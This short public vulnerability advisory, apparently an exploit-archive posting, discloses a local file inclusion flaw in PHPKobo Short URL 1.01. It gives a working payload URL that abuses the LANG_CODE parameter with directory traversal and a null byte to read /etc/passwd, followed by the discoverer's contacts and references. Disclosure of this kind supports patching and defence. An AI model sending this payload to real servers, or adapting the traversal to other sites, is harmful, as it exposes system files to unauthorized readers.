

| Risk |
Local |
| Remote |
| Medium |
No |
| Yes |
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Short URL
# Version: 1.01
# Vendor: http://www.phpkobo.com/short_url.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/staff/app/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################
References:
http://www.securityfocus.com/bid/38731
http://www.exploit-db.com/exploits/11775
http://secunia.com/advisories/38968
http://packetstormsecurity.org/1003-exploits/shorturl-lfi.txt
[ ASCII VERSION ]
|